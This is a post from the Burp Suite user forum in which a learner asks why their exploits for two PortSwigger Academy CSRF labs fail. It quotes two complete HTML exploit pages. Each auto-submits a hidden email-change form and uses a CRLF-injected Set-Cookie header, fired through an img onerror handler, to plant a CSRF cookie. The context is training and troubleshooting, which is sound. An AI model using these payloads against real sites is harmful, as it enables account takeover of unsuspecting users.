The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Academy: CSRF labs #5 & #6 problem with solving

Aleksandra | Last updated: Jun 26, 2023 08:30PM UTC

I have been working on the CSRF Labs and I'm having problem with the following labs: - Lab #5: CSRF where token is tied to non-session cookie - Lab #6: CSRF where token is duplicated in cookie issues And upon delivering both exploits using the exploit server, I don't get any success message for the lab and it remains unsolved. The victim's email does get changed when I submit the request with the attacker's CSRF key and token using Burp Repeater. I have followed the YouTube instruction but it still didn't get solved. When I view the exploit it says "Invalid CSRF Token". I don't understand how it can be as I have checked that I am using a fresh CSRF token and key from the attacker (Carlos). - Lab #5: CSRF where token is tied to non-session cookie <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://0a2f00870305510683f72f8400e70061.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="wienr%40no-user.net"/> <input type="hidden" name="csrf" value="5m9HX7cubtOReLmMqyJ1F5s8PioGw5A9"/> <input type="submit" value="Submit request"/> </form> <img src="https://0a2f00870305510683f72f8400e70061.web-security-academy.net/?search=TEST%0d%0aSet-Cookie:%20csrfKey=yg39DWT4wKCpNJtVI8Xy2F2NXAAxwugT" onerror="document.forms[0].submit()"> </body> </html> - Lab #6: CSRF where token is duplicated in cookie issues <html> <body> <script>history.pushState(' ', ' ', ' / ')</script> <form action="https://0a2f004003a10d5f81b35c4000e9006f.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="wienr%40no-user.net" /> <input type="hidden" name="csrf" value="test" /> <input type="submit" value="Submit request" /> </form> <img src="https://0a2f004003a10d5f81b35c4000e9006f.web-security-academy.net/?search=TEST%0d%0aSet-Cookie:%20csrfKey=test" onerror="document.forms[0].submit()"> </body> </html> Can you spot what is issue on my exploits? Thank you!

Ben, PortSwigger Agent | Last updated: Jun 28, 2023 07:23AM UTC